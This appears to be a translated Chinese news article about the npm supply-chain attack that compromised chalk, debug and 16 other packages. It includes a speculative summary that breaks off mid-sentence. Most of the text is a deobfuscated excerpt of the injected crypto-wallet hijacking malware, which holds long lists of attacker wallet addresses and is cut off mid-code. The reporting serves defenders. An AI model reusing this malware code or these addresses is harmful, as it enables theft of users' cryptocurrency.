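This incident is indeed shocking, and it highlights the security risks that exist in the NPM ecosystem. Let's look at its key points, possible causes, impact, and the preventive measures that can be taken.
Incident recap:
NPM package downloads plummet: A mainstream NPM package with 2.6 billion weekly downloads saw its download count suddenly fall to an extremely low level overnight.
Developer account stolen: The package's developer account is presumed to have been hit by a phishing attack, which led to the account being taken over.
Malicious code injection: The attackers may have used the stolen account to inject malicious code into the NPM package, or modified the package's metadata so that users could not download or use it normally.
Possible causes:
1. Phishing: This is the most likely cause. Using phishing emails, fake websites and similar means, the attackers tricked the NPM package developer into clicking a malicious link and entering a username and password, and so stole the developer's account.
2. Weak account security awareness: The developer may have used a weak password or not enabled two-step verification, making the account easy to break into.
3. A vulnerability in the NPM platform itself: Although less likely, it cannot be completely ruled out that the NPM platform has a security vulnerability that attackers exploited to attack developer accounts.
Impact:
Damage to the developer's reputation: The developer's reputation is seriously harmed and users' trust declines.
Security risk to users' code: For users who downloaded and used this NPM package, their
Related content: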
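Compiled by | Su Mi (蘇宓)
Produced by | CSDN (ID: CSDNnews)
Overnight, the NPM software ecosystem took a heavy hit. Using phishing emails disguised as official notices, attackers broke into a well-known developer's account, tampered with at least 18 heavily downloaded core packages, and planted malicious code in them. Together these packages have more than 2 billion weekly downloads, and according to BleepingComputer the actual figure is as high as 2.6 billion, so the impact covers almost the entire mainstream NPM ecosystem.
The incident was first disclosed by the security firm Aikido, which also published an in-depth analysis of this supply-chain attack, raising widespread concern among developers and users.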

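18 mainstream npm packages compromised
According to the timeline published by Aikido, at around 13:16 (UTC) on September 8 its intelligence system detected suspicious behavior in a batch of packages pushed to npm, which appeared to have had malicious code planted in them.
A total of 18 packages were affected, almost all of them core dependencies with huge download counts, including:
backslash (260,000 weekly downloads)
chalk-template (3.9 million weekly downloads)
supports-hyperlinks (19.2 million weekly downloads)
has-ansi (12.1 million weekly downloads)
simple-swizzle (26.26 million weekly downloads)
color-string (27.48 million weekly downloads)
error-ex (47.17 million weekly downloads)
color-name (191.7 million weekly downloads)
is-arrayish (73.8 million weekly downloads)
slice-ansi (59.8 million weekly downloads)
color-convert (193.5 million weekly downloads)
wrap-ansi (197.99 million weekly downloads)
ansi-regex (243.64 million weekly downloads)
supports-color (287.1 million weekly downloads)
strip-ansi (261.17 million weekly downloads)
chalk (299.99 million weekly downloads)
debug (357.6 million weekly downloads)
ansi-styles (371.41 million weekly downloads)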

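Malicious code that tampers with what the web page displays
Looking further, Aikido found that the attackers had planted a piece of malicious code in the newly published versions of these packages. is-arrayish is one example.

There, the index.js file has been modified and contains obfuscated code:

After some deobfuscation, the security researchers found that it still contains a fairly complex piece of code.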
var neth = 0;
var rund = 0;
var loval = 0;
async function checkethereumw {
try {
const _0x124ed3 = await window.ethereum.request({
'method': "eth_accounts"
});
if (_0x124ed3.length > 0) {
runmask;
if (rund != 1) {
rund = 1;
neth = 1;
newdlocal;
}
} else if (rund != 1) {
rund = 1;
newdlocal;
}
} catch (_0x53a897) {
if (rund != 1) {
rund = 1;
newdlocal;
}
}
}
if (typeof window != "undefined" && typeof window.ethereum != "undefined") {
checkethereumw;
} else if (rund != 1) {
rund = 1;
newdlocal;
}
function newdlocal {
const _0xba16ef = {
'zprkq': function (_0x23e86b, _0x5b593c) {
return _0x23e86b + _0x5b593c;
},
'iJAYR': function (_0xc91263, _0x20ad3a) {
return _0xc91263
},
'nqxhl': function (_0x31d70d, _0x545869) {
return _0x31d70d
},
'myaXd': function (_0xd587f7, _0x356cb8) {
return _0xd587f7 === _0x356cb8;
},
'IptyQ': function (_0x52d73c, _0x1701dc) {
return _0x52d73c - _0x1701dc;
},
'QCTBQ': function (_0x3b97a6, _0x5cd5e9) {
return _0x3b97a6 - _0x5cd5e9;
},
'avmeH': function (_0x370f68, _0x51151b) {
return _0x370f68 - _0x51151b;
},
'TwyPu': function (_0x43ced5, _0x54174b) {
return _0x43ced5 + _0x54174b;
},
'arczN': function (_0x2b592d, _0x5339ba) {
return _0x2b592d - _0x5339ba;
},
'yMgZR': function (_0xb3fb8a, _0x24a479) {
return _0xb3fb8a - _0x24a479;
},
'qEVKr': function (_0x4a3a26, _0x16853b) {
return _0x4a3a26 - _0x16853b;
},
'vGpiX': function (_0x9c66ab, _0x1a38b9, _0x1d740b) {
return _0x9c66ab(_0x1a38b9, _0x1d740b);
},
'eGWOd': function (_0x3630fa, _0x17694b) {
return _0x3630fa
},
'tfqRA': function (_0x562199, ..._0x1555b8) {
return _0x562199(..._0x1555b8);
},
'viQtk': "Content-Type",
'DSXar': "application/json",
'mDaWt': function (_0x2116fd, _0x26f622) {
return _0x2116fd(_0x26f622);
},
'FXtyf': function (_0x4f1346, _0x53343b) {
return _0x4f1346 === _0x53343b;
},
'FYAPh': "string",
'UmfJm': function (_0x301d56, _0x29139b) {
return _0x301d56 === _0x29139b;
},
'LmXxC': function (_0x467473, _0x5d7154) {
return _0x467473(_0x5d7154);
},
'yVHgJ': "responseText",
'aXpuC': "response",
'yArwb': "object",
'MJKcn': function (_0x5561bf, _0x1792e6) {
return _0x5561bf !== _0x1792e6;
},
'gHrJP': function (_0xe2c323, _0x4c49d0) {
return _0xe2c323 === _0x4c49d0;
},
'OiGzk': "1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx",
'EAhsy': "1Li1CRPwjovnGHGPTtcKzy75j37K6n97Rd",
'lLQUz': "1Dk12ey2hKWJctU3V8Akc1oZPo1ndjbnjP",
'ibPEr': "1NBvJqc1GdSb5uuX8vT7sysxtT4LB8GnuY",
'cGpnb': "1Mtv6GsFsbno9XgSGuG6jRXyBYv2tgVhMj",
'wAGlT': "1BBAQm4DL78JtRdJGEfzDBT2PBkGyvzf4N",
'Hauzr': "1KkovSeka94yC5K4fDbfbvZeTFoorPggKW",
'nJNgC': "18CPyFLMdncoYccmsZPnJ5T1hxFjh6aaiV",
'EHOlV': "1BijzJvYU2GaBCYHa8Hf3PnJh6mjEd92UP",
'cOZYT': "1Bjvx6WXt9iFB5XKAVsU3TgktgeNbzpn5N",
'cIySf': "19fUECa9aZCQxcLeo8FZu8kh5kVWheVrg8",
'rrGeC': "1DZEep7GsnmBVkbZR3ogeBQqwngo6x4XyR",
'geUVS': "1GX1FWYttd65J26JULr9HLr98K7VVUE38w",
'TZdxq': "14mzwvmF2mUd6ww1gtanQm8Bxv3ZWmxDiC",
'JgcFw': "1EYHCtXyKMMhUiJxXJH4arfpErNto5j87k",
'gKbQq': "19D1QXVQCoCLUHUrzQ4rTumqs9jBcvXiRg",
'KObJu': "16mKiSoZNTDaYLBQ5LkunK6neZFVV14b7X",
'vYGdx': "18x8S4yhFmmLUpZUZa3oSRbAeg8cpECpne",
'gtZOV': "1EkdNoZJuXTqBeaFVzGwp3zHuRURJFvCV8",
'ApfqP': "13oBVyPUrwbmTAbwxVDMT9i6aVUgm5AnKM",
'hgmsX': "1DwsWaXLdsn4pnoMtbsmzbH7rTj5jNH6qS",
'TNgNB': "13wuEH28SjgBatNppqgoUMTWwuuBi9e4tJ",
'UhmAX': "154jc6v7YwozhFMppkgSg3BdgpaFPtCqYn",
'vXyJx': "1AP8zLJE6nmNdkfrf1piRqTjpasw7vk5rb",
'HmJHn': "19F8YKkU7z5ZDAypxQ458iRqH2ctGJFVCn",
'UlhFZ': "17J3wL1SapdZpT2ZVX72Jm5oMSXUgzSwKS",
'VShzV': "16z8D7y3fbJsWFs3U8RvBF3A8HLycCW5fH",
'IzSNV': "1PYtCvLCmnGDNSVK2gFE37FNSf69W2wKjP",
'hiXcO': "143wdqy6wgY3ez8Nm19AqyYh25AZHz3FUp",
'gwsfo': "1JuYymZbeoDeH5q65KZVG3nBhYoTK9YXjm",
'XjToi': "1PNM2L1bpJQWipuAhNuB7BZbaFLB3LCuju",
'qzLJJ': "19onjpqdUsssaFKJjwuAQGi2eS41vE19oi",
'NrttU': "1JQ15RHehtdnLAzMcVT9kU8qq868xFEUsS",
'mLamd': "1LVpMCURyEUdE8VfsGqhMvUYVrLzbkqYwf",
'ENfnx': "1KMcDbd2wecP4Acoz9PiZXsBrJXHbyPyG6",
'teGcp': "1DZiXKhBFiKa1f6PTGCNMKSU1xoW3Edb7Z",
'lkQtS': "174bEk62kr8dNgiduwHgVzeLgLQ38foEgZ",
'nVfSu': "17cvmxcjTPSBsF1Wi2HfcGXnpLBSzbAs6p",
'XdmQg': "1NoYvnedUqNshKPZvSayfk8YTQYvoB2wBc",
'hTAuL': "13694eCkAtBRkip8XdPQ8ga99KEzyRnU6a",
'hmVdI': "bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm",
'SvssU': "bc1qznntn2q7df8ltvx842upkd9uj4atwxpk0whxh9",
'zXlNj': "bc1q4rllc9q0mxs827u6vts2wjvvmel0577tdsvltx",
'OOAQz': "bc1qj8zru33ngjxmugs4sxjupvd9cyh84ja0wjx9c4",
'TDfnH': "bc1qc972tp3hthdcufsp9ww38yyer390sdc9cvj8ar",
'UrAmA': "bc1qw0z864re8yvrjqmcw5fs6ysndta2avams0c6nh",
'ELPqV': "bc1qzdd8c7g2g9mnnxy635ndntem2827ycxxyn3v4h",
'xlnbk': "bc1qaavgpwm98n0vtaeua539gfzgxlygs8jpsa0mmt",
'aApMn': "bc1qrdlkyhcrx4n2ksfjfh78xnqrefvsr34nf2u0sx",
'Pvsjl': "bc1q9ytsyre66yz56x3gufhqks7gqd8sa8uk4tv5fh",
'fmvYL': "bc1qfrvsj2dkey2dg8ana0knczzplcqr7cgs9s52vq",
'fXywx': "bc1qg7lkw04hg5yggh28ma0zvtkeg95k0yefqmvv2f",
'RRxbR': "bc1qmeplum3jy2vrlyzw4vhrcgeama35tr9kw8yfrn",
'VrdPL': "bc1qamqx0h8rxfcs4l56egrpau4ryqu4r642ttmxq4",
'qSKMT': "bc1qsaxgtck26mgecgfvp9ml4y5ljyl8ylpdglqz30",
'mbTQq': "bc1qsz90ulta8dx5k8xzzjqruzahav2vxchtk2l8v7",
'xHmCb': "bc1q3ad2zyc5mpc9nnzmmtxqpu467jeh4m928r7qf4",
'OqeMw': "bc1qlrdqrulwmvfg86rmp77k8npdefns52ykk8cxs6",
'BNnlw': "bc1q5hqxk5ugvf2d3y6qj2a7cy7u79ckusu9eknpsr",
'FkDWd': "bc1qszm3nugttmtpkq77dhphtqg4u7vuhxxcrh7f79",
'aBdRe': "bc1qqc09xnyafq0y4af3x7j5998tglxcanjuzy974m",
'roief': "bc1qqqh29zxfzxk0fvmq9d7hwedh5yz44zhf7e23qz",
'qMxmV': "bc1qsg57tpvfj6gysrw5w4sxf3dweju40g87uuclvu",
'kkYGi': "bc1qje95nehs8y0wvusp2czr25p7kghk6j3cvgugy5",
'zbnSH': "bc1qwrnchp96p38u8ukp8jc8cq22q35n3ajfav0pzf",
'dHxYm': "bc1q6l99s704jccclxx5rc2x2c5shlgs2pg0fpnflk",
'OfXMz': "bc1qeuk2u6xl4rgfq0x9yc37lw49kutnd8gdlxt9st",
'OZznV': "bc1qxul8lwxvt7lt9xuge0r2jls7evrwyyvcf2ah0u",
'NHzcN': "bc1qcplvxyzs9w09g6lpglj6xxdfxztfwjsgz95czd",
'sxqWF': "bc1q9ca9ae2cjd3stmr9lc6y527s0x6vvqys6du00u",
'oIQra': "bc1qmap3cqss3t4vetg8z9s995uy62jggyxjk29jkp",
'qIAwe': "bc1qg3c6c7y5xeqkxnjsx9ymclslr2sncjrxjylkej",
'IneJW': "bc1q9zx63qdjwldxp4s9egeqjelu3y5yqsajku8m29",
'tjIgE': "bc1ql2awtv7nzcp2dqce3kny2ra3dz946c9vg2yukq",
'vuJMD': "bc1qhytpe64tsrrvgwm834q35w6607jc6azqtnvl2a",
'Uxzul': "bc1q4rlgfgjwg9g2pqwqkf5j9hq6ekn39rjmzv09my",
'MoAYB': "bc1q28ks0u6fhvv7hktsavnfpmu59anastfj5sq8dw",
'wKaGs': "bc1qjqfpxvl2j2hzx2cxeqhchrh02dcjy3z5k6gv55",
'VmOdy': "bc1q8zznzs9z93xpkpunrmeqp6fg54s3q7dkh9z9xw",
'YcvKY': "bc1qt4c4e6xwt5dz4p629ndz9zmeep2kmvqgy53037",
'FlhWy': "0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976",
'sCKdW': "0xa29eeFb3f21Dc8FA8bce065Db4f4354AA683c024",
'ZAiba': "0x40C351B989113646bc4e9Dfe66AE66D24fE6Da7B",
'AsHKD': "0x30F895a2C66030795131FB66CBaD6a1f91461731",
'rzrhZ': "0x57394449fE8Ee266Ead880D5588E43501cb84cC7",
'expPy': "0xCd422cCC9f6e8f30FfD6F68C0710D3a7F24a026A",
'zlBwY': "0x7C502F253124A88Bbb6a0Ad79D9BeD279d86E8f4",
'nElAL': "0xe86749d6728d8b02c1eaF12383c686A8544de26A",
'wqRjK': "0xa4134741a64F882c751110D3E207C51d38f6c756",
'HcYDT': "0xD4A340CeBe238F148034Bbc14478af59b1323d67",
'BqNRF': "0xB00A433e1A5Fc40D825676e713E5E351416e6C26",
'OvURa': "0xd9Df4e4659B1321259182191B683acc86c577b0f",
'PFfEj': "0x0a765FA154202E2105D7e37946caBB7C2475c76a",
'IOjJb': "0xE291a6A58259f660E8965C2f0938097030Bf1767",
'uKfqV': "0xe46e68f7856B26af1F9Ba941Bc9cd06F295eb06D",
'DAJYA': "0xa7eec0c4911ff75AEd179c81258a348c40a36e53",
'SUVoY': "0x3c6762469ea04c9586907F155A35f648572A0C3E",
'WJmWS': "0x322FE72E1Eb64F6d16E6FCd3d45a376efD4bC6b2",
'QBAXK': "0x51Bb31a441531d34210a4B35114D8EF3E57aB727",
'zLNIR': "0x314d5070DB6940C8dedf1da4c03501a3AcEE21E1",
'kTQGi': "0x75023D76D6cBf88ACeAA83447C466A9bBB0c5966",
'XJxSR': "0x1914F36c62b381856D1F9Dc524f1B167e0798e5E",
'kHjMo': "0xB9e9cfd931647192036197881A9082cD2D83589C",
'kxPDg': "0xE88ae1ae3947B6646e2c0b181da75CE3601287A4",
'gWISZ': "0x0D83F2770B5bDC0ccd9F09728B3eBF195cf890e2",
'hIHlD': "0xe2D5C35bf44881E37d7183DA2143Ee5A84Cd4c68",
'QgItq': "0xd21E6Dd2Ef006FFAe9Be8d8b0cdf7a667B30806d",
'bLJZU': "0x93Ff376B931B92aF91241aAf257d708B62D62F4C",
'IdVSI': "0x5C068df7139aD2Dedb840ceC95C384F25b443275",
'Rpwne': "0x70D24a9989D17a537C36f2FB6d8198CC26c1c277",
'NYUBp': "0x0ae487200606DEfdbCEF1A50C003604a36C68E64",
'eQrXq': "0xc5588A6DEC3889AAD85b9673621a71fFcf7E6B56",
'yRdVI': "0x3c23bA2Db94E6aE11DBf9cD2DA5297A09d7EC673",
'IDnjA': "0x5B5cA7d3089D3B3C6393C0B79cDF371Ec93a3fd3",
'ajXoV': "0x4Cb4c0E7057829c378Eb7A9b174B004873b9D769",
'xyHoE': "0xd299f05D1504D0B98B1D6D3c282412FD4Df96109",
'TCqKY': "0x241689F750fCE4A974C953adBECe0673Dc4956E0",
'dQfUy': "0xBc5f75053Ae3a8F2B9CF9495845038554dDFb261",
'ctRhh': "0x5651dbb7838146fCF5135A65005946625A2685c8",
'JbMdu': "0x5c9D146b48f664f2bB4796f2Bb0279a6438C38b1",
'gjuIU': "0xd2Bf42514d35952Abf2082aAA0ddBBEf65a00BA3",
'fmDjk': "0xbB1EC85a7d0aa6Cd5ad7E7832F0b4c8659c44cc9",
'GjipQ': "0x013285c02ab81246F1D68699613447CE4B2B4ACC",
'wHLUW': "0x97A00E100BA7bA0a006B2A9A40f6A0d80869Ac9e",
'gYVeZ': "0x4Bf0C0630A562eE973CE964a7d215D98ea115693",
'Sqlrp': "0x805aa8adb8440aEA21fDc8f2348f8Db99ea86Efb",
'pcqRS': "0xae9935793835D5fCF8660e0D45bA35648e3CD463",
'fMapR': "0xB051C0b7dCc22ab6289Adf7a2DcEaA7c35eB3027",
'ITrjn': "0xf7a82C48Edf9db4FBe6f10953d4D889A5bA6780D",
'Ixxxa': "0x06de68F310a86B10746a4e35cD50a7B7C8663b8d",
'DdqMx': "0x51f3C0fCacF7d042605ABBE0ad61D6fabC4E1F54",
'mddEm': "0x49BCc441AEA6Cd7bC5989685C917DC9fb58289Cf",
'GQlpD': "0x7fD999f778c1867eDa9A4026fE7D4BbB33A45272",
'PFPfJ': "0xe8749d2347472AD1547E1c6436F267F0EdD725Cb",
'rgsmH': "0x2B471975ac4E4e29D110e43EBf9fBBc4aEBc8221",
'kkUbC': "0x02004fE6c250F008981d8Fc8F9C408cEfD679Ec3",
'qHwwv': "0xC4A51031A7d17bB6D02D52127D2774A942987D39",
'mlgET': "0xa1b94fC12c0153D3fb5d60ED500AcEC430259751",
'Sflwm': "0xdedda1A02D79c3ba5fDf28C161382b1A7bA05223",
'cKcDU': "0xE55f51991C8D01Fb5a99B508CC39B8a04dcF9D04",
'tWKKt': "5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6",
'GeUXv': "98EWM95ct8tBYWroCxXYN9vCgN7NTcR6nUsvCx1mEdLZ",
'IFMoj': "Gs7z9TTJwAKyxN4G3YWPFfDmnUo3ofu8q2QSWfdxtNUt",
'shIUB': "CTgjc8kegnVqvtVbGZfpP5RHLKnRNikArUYFpVHNebEN",
'IfmWW': "7Nnjyhwsp8ia2W4P37iWAjpRao3Bj9tVZBZRTbBpwXWU",
'aLjQi': "3KFBge3yEg793VqVV1P6fxV7gC9CShh55zmoMcGUNu49",
'ytLpw': "9eU7SkkFGWvDoqSZLqoFJ9kRqJXDQYcEvSiJXyThCWGV",
'gjXjd': "4SxDspwwkviwR3evbZHrPa3Rw13kBr51Nxv86mECyXUF",
'alqyK': "9dtS7zbZD2tK7oaMUj78MKvgUWHbRVLQ95bxnpsCaCLL",
'tySZZ': "7mdCoRPc1omTiZdYY2xG81EvGwN7Z2yodUTX9ZmLm3fx",
'wEEzD': "8rdABs8nC2jTwVhR9axWW7WMbGZxW7JUzNV5pRF8KvQv",
'PFTuz': "55YtaEqYEUM7ASAZ9XmVdSBNy6F7r5zkdLsJFv2ZPtAx",
'uMBVu': "Gr8Kcyt8UVRF1Pux7YHiK32Spm7cmnFVL6hd7LSLHqoB",
'gGKEH': "9MRmVsciWKDvwwTaZQCK2NvJE2SeVU8W6EGFmukHTRaB",
'QlDwm': "5j4k1Ye12dXiFMLSJpD7gFrLbv4QcUrRoKHsgo32kRFr",
'PbcYH': "F1SEspGoVLhqJTCFQEutTcKDubw44uKnqWc2ydz4iXtv",
'isJWQ': "G3UBJBY69FpDbwyKhZ8Sf4YULLTtHBtJUvSX4GpbTGQn",
'NORtg': "DZyZzbGfdMy5GTyn2ah2PDJu8LEoKPq9EhAkFRQ1Fn6K",
'OWMqm': "HvygSvLTXPK4fvR17zhjEh57kmb85oJuvcQcEgTnrced",
'mAOhu': "TB9emsCq6fQw6wRk4HBxxNnU6Hwt1DnV67",
'zNJib': "TSfbXqswodrpw8UBthPTRRcLrqWpnWFY3y",
'JIaJy': "TYVWbDbkapcKcvbMfdbbcuc3PE1kKefvDH",
'ycYrn': "TNaeGxNujpgPgcfetYwCNAZF8BZjAQqutc",
'YofCH': "TJ1tNPVj7jLK2ds9JNq15Ln6GJV1xYrmWp",
'iKJKA': "TGExvgwAyaqwcaJmtJzErXqfra66YjLThc",
'oQtxT': "TC7K8qchM7YXZPdZrbUY7LQwZaahdTA5tG",
'Gnngl': "TQuqKCAbowuQYEKB9aTnH5uK4hNvaxDCye",
'AIOZX': "TFcXJysFgotDu6sJu4zZPAvr9xHCN7FAZp",
'LBXrZ': "TLDkM4GrUaA13PCHWhaMcGri7H8A8HR6zR",
'GcWUu': "TPSLojAyTheudTRztqjhNic6rrrSLVkMAr",
'uWYHo': "TY2Gs3RVwbmcUiDpxDhchPHF1CVsGxU1mo",
'AjRST': "TCYrFDXHBrQkqCPNcp6V2fETk7VoqjCNXw",
'OghhW': "TKcuWWdGYqPKe98xZCWkmhc1gKLdDYvJ2f",
'WYxMs': "TP1ezNXDeyF4RsM3Bmjh4GTYfshf5hogRJ",
'XPQAU': "TJcHbAGfavWSEQaTTLotG7RosS3iqV5WMb",
'kQfYh': "TD5U7782gp7ceyrsKwekWFMWF9TjhC6DfP",
'fQZCx': "TEu3zgthJE32jfY6bYMYGNC7BU2yEXVBgW",
'UzPHF': "TK5r74dFyMwFSTaJF6dmc2pi7A1gjGTtJz",
'qJMvq': "TBJH4pB4QPo96BRA7x6DghEv4iQqJBgKeW",
'sZVdB': "TKBcydgFGX9q3ydaPtxht1TRAmcGybRozt",
'zzvgO': "TQXoAYKPuzeD1X2c4KvQ4gXhEnya3AsYwC",
'maiTu': "TJCevwYQhzcSyPaVBTa15y4qNY2ZxkjwsZ",
'ZpFNE': "THpdx4MiWbXtgkPtsrsvUjHF5AB4u7mx3E",
'jTVMz': "TWpCDiY8pZoY9dVknsy3U4mrAwVm8mCBh6",
'zBKSx': "TK5zyFYoyAttoeaUeWGdpRof2qRBbPSV7L",
'CsfLH': "TAzmtmytEibzixFSfNvqqHEKmMKiz9wUA9",
'LCszu': "TCgUwXe3VmLY81tKBrMUjFBr1qPnrEQFNK",
'cdzQW': "TTPWAyW3Q8MovJvDYgysniq41gQnfRn21V",
'xBxZT': "TWUJVezQta4zEX94RPmFHF2hzQBRmYiEdn",
'ESuTT': "TPeKuzck7tZRXKh2GP1TyoePF4Rr1cuUAA",
'emvMl': "TJUQCnHifZMHEgJXSd8SLJdVAcRckHGnjt",
'xVGnF': "TCgX32nkTwRkapNuekTdk1TByYGkkmcKhJ",
'hxLhB': "TFDKvuw86wduSPZxWTHD9N1TqhXyy9nrAs",
'EeQvC': "TQVpRbBzD1au3u8QZFzXMfVMpHRyrpemHL",
'pELnW': "TSE2VkcRnyiFB4xe8an9Bj1fb6ejsPxa9Z",
'qzqrf': "THe32hBm9nXnzzi6YFqYo8LX77CMegX3v5",
'ZjUWz': "TXfcpZtbYfVtLdGPgdoLm6hDHtnrscvAFP",
'LieOP': "TXgVaHDaEyXSm1LoJEqFgKWTKQQ1jgeQr7",
'pPSEL': "TD5cRTn9dxa4eodRWszGiKmU4pbpSFN87P",
'Cubxg': "LNFWHeiSjb4QB4iSHMEvaZ8caPwtz4t6Ug",
'tdnnB': "LQk8CEPMP4tq3mc8nQpsZ1QtBmYbhg8UGR",
'WBSil': "LMAJo7CV5F5scxJsFW67UsY2RichJFfpP6",
'aiczm': "LUvPb1VhwsriAm3ni77i3otND2aYLZ8fHz",
'RVLCn': "LhWPifqaGho696hFVGTR1KmzKJ8ps7ctFa",
'UpXNN': "LZZPvXLt4BtMzEgddYnHpUWjDjeD61r5aQ",
'FOnBW': "LQfKhNis7ZKPRW6H3prbXz1FJd29b3jsmT",
'iMpIh': "LSihmvTbmQ9WZmq6Rjn35SKLUdBiDzcLBB",
'mynAv': "Ldbnww88JPAP1AUXiDtLyeZg9v1tuvhHBP",
'LthXt': "LR3YwMqnwLt4Qdn6Ydz8bRFEeXvpbNZUvA",
'thBMJ': "Lbco8vJ56o1mre6AVU6cF7JjDDscnYHXLP",
'SDnYd': "LfqFuc3sLafGxWE8vdntZT4M9NKq6Be9ox",
'rsFGZ': "LLcmXxj8Zstje6KqgYb11Ephj8bGdyF1vP",
'GERuP': "LcJwR1WvVRsnxoe1A66pCzeXicuroDP6L6",
'YnKTx': "LUNKimRyxBVXLf9gp3FZo2iVp6D3yyzJLJ",
'qeLYC': "LY1NnVbdywTNmq45DYdhssrVENZKv7Sk8H",
'bHFpc': "LNmMqhqpyDwb1zzZReuA8aVUxkZSc4Ztqq",
'yJtyM': "LdxgXRnXToLMBML2KpgGkdDwJSTM6sbiPE",
'UthzI': "LZMn8hLZ2kVjejmDZiSJzJhHZjuHq8Ekmr",
'HRVKG': "LVnc1MLGDGKs2bmpNAH7zcHV51MJkGsuG9",
'DYFsg': "LRSZUeQb48cGojUrVsZr9eERjw4K1zAoyC",
'vJoTb': "LQpGaw3af1DQiKUkGYEx18jLZeS9xHyP9v",
'SCttQ': "LiVzsiWfCCkW2kvHeMBdawWp9TE8uPgi6V",
'TLtwe': "LY32ncFBjQXhgCkgTAd2LreFv3JZNTpMvR",
'zubSd': "LdPtx4xqmA4HRQCm3bQ9PLEneMWLdkdmqg",
'jnPSm': "LYcHJk7r9gRbg2z3hz9GGj91Po6TaXDK3k",
'tkhoC': "LMhCVFq5fTmrwQyzgfp2MkhrgADRAVCGsk",
'UXYpW': "LPv1wSygi4vPp9UeW6EfWwepEeMFHgALmN",
'QtlzB': "Lf55UbTiSTjnuQ8uWzUBtzghztezEfSLvT",
'wYQWn': "LdJHZeBQovSYbW1Lei6CzGAY4d3mUxbNKs",
'abbui': "LbBxnFaR1bZVN2CquNDXGe1xCuu9vUBAQw",
'zndLO': "LWWWPK2SZZKB3Nu8pHyq2yPscVKvex5v2X",
'kXpEP': "LYN4ESQuJ1TbPxQdRYNrghznN8mQt8WDJU",
'gBdKm': "LiLzQs4KU79R5AUn9jJNd7EziNE7r32Dqq",
'AJBPj': "LeqNtT4aDY9oM1G5gAWWvB8B39iUobThhe",
'dDlKv': "LfUdSVrimg54iU7MhXFxpUTPkEgFJonHPV",
'upwRp': "LTyhWRAeCRcUC9Wd3zkmjz3AhgX6J18kxZ",
'wKEAH': "Lc2LtsEJmPYay1oj7v8xj16mSV15BwHtGu",
'Kivgs': "LVsGi1QVXucA6v9xsjwaAL8WYb7axdekAK",
'atdgC': "LewV6Gagn52Sk8hzPHRSbBjUpiNAdqmB9z",
'wORrq': "bitcoincash:qpwsaxghtvt6phm53vfdj0s6mj4l7h24dgkuxeanyh",
'AXcYN': "bitcoincash:qq7dr7gu8tma7mvpftq4ee2xnhaczqk9myqnk6v4c9",
'nJmrw': "bitcoincash:qpgf3zrw4taxtvj87y5lcaku77qdhq7kqgdga5u6jz",
'jiCnV': "bitcoincash:qrkrnnc5kacavf5pl4n4hraazdezdrq08ssmxsrdsf",
'IEyeW': "bitcoincash:qqdepnkh89dmfxyp4naluvhlc3ynej239sdu760y39",
'LPwMj': "bitcoincash:qqul8wuxs4ec8u4d6arkvetdmdh4ppwr0ggycetq97",
'QeXkq': "bitcoincash:qq0enkj6n4mffln7w9z6u8vu2mef47jwlcvcx5f823",
'AXCnW': "bitcoincash:qrc620lztlxv9elhj5qzvmf2cxhe7egup5few7tcd3",
'BvvIY': "bitcoincash:qrf3urqnjl4gergxe45ttztjymc8dzqyp54wsddp64",
'WdGef': "bitcoincash:qr7mkujcr9c38ddfn2ke2a0sagk52tllesderfrue8",
'MdtCY': "bitcoincash:qqgjn9yqtud5mle3e7zhmagtcap9jdmcg509q56ynt",
'lcvXH': "bitcoincash:qpuq8uc9ydxszny5q0j4actg30he6uhffvvy0dl7er",
'jQkco': "bitcoincash:qz0640hjl2m3n2ca26rknljpr55gyd9pjq89g6xhrz",
'XcaTu': "bitcoincash:qq0j6vl2ls2g8kkhkvpcfyjxns5zq03llgsqdnzl4s",
'JEZmD': "bitcoincash:qq8m8rkl29tcyqq8usfruejnvx27zxlpu52mc9spz7",
'PQrIR': "bitcoincash:qpudgp66jjj8k9zec4na3690tvu8ksq4fq8ycpjzed",
'JDUWN': "bitcoincash:qqe3qc9uk08kxnng0cznu9xqqluwfyemxym7w2e3xw",
'CZKkU': "bitcoincash:qpukdxh30d8dtj552q2jet0pqvcvt64gfujaz8h9sa",
'GGbBw': "bitcoincash:qqs4grdq56y5nnamu5d8tk450kzul3aulyz8u66mjc",
'TlKHF': "bitcoincash:qp7rhhk0gcusyj9fvl2ftr06ftt0pt8wgumd8ytssd",
'gvWhS': "bitcoincash:qpmc3y5y2v7h3x3sgdg7npau034fsggwfczvuqtprl",
'TOyco': "bitcoincash:qzum0qk4kpauy8ljspmkc5rjxe5mgam5xg7xl5uq2g",
'uzHQJ': "bitcoincash:qqjqp8ayuky5hq4kgrarpu40eq6xjrneuurc43v9lf",
'Ddxxq': "bitcoincash:qqxu6a3f0240v0mwzhspm5zeneeyecggvufgz82w7u",
'SkKwK': "bitcoincash:qpux2mtlpd03d8zxyc7nsrk8knarnjxxts2fjpzeck",
'xlIOq': "bitcoincash:qpcgcrjry0excx80zp8hn9vsn4cnmk57vylwa5mtz3",
'cGdGB': "bitcoincash:qpjj6prm5menjatrmqaqx0h3zkuhdkfy75uauxz2sj",
'NJweA': "bitcoincash:qp79qg7np9mvr4mg78vz8vnx0xn8hlkp7sk0g86064",
'liySF': "bitcoincash:qr27clvagvzra5z7sfxxrwmjxy026vltucdkhrsvc7",
'dZzai': "bitcoincash:qrsypfz3lqt8xtf8ej5ftrqyhln577me6v640uew8j",
'qPXMY': "bitcoincash:qrzfrff4czjn6ku0tn2u3cxk7y267enfqvx6zva5w6",
'GSmbj': "bitcoincash:qr7exs4az754aknl3r5gp9scn74dzjkcrgql3jpv59",
'oFfnO': "bitcoincash:qq35fzg00mzcmwtag9grmwljvpuy5jm8kuzfs24jhu",
'oBsPL': "bitcoincash:qra5zfn74m7l85rl4r6wptzpnt2p22h7552swkpa7l",
'fqBSI': "bitcoincash:qzqllr0fsh9fgfvdhmafx32a0ddtkt52evnqd7w7h7",
'GqRgo': "bitcoincash:qpjdcwld84wtd5lk00x8t7qp4eu3y0xhnsjjfgrs7q",
'TSvsw': "bitcoincash:qrgpm5y229xs46wsx9h9mlftedmsm4xjlu98jffmg3",
'gIXXv': "bitcoincash:qpjl9lkjjp4s6u654k3rz06rhqcap849jg8uwqmaad",
'NNxYW': "bitcoincash:qra5uwzgh8qus07v3srw5q0e8vrx5872k5cxguu3h5",
'wgjIC': "bitcoincash:qz6239jkqf9qpl2axk6vclsx3gdt8cy4z5rag98u2r",
'NbGXK': function (_0x6fd57a, _0x45613c) {
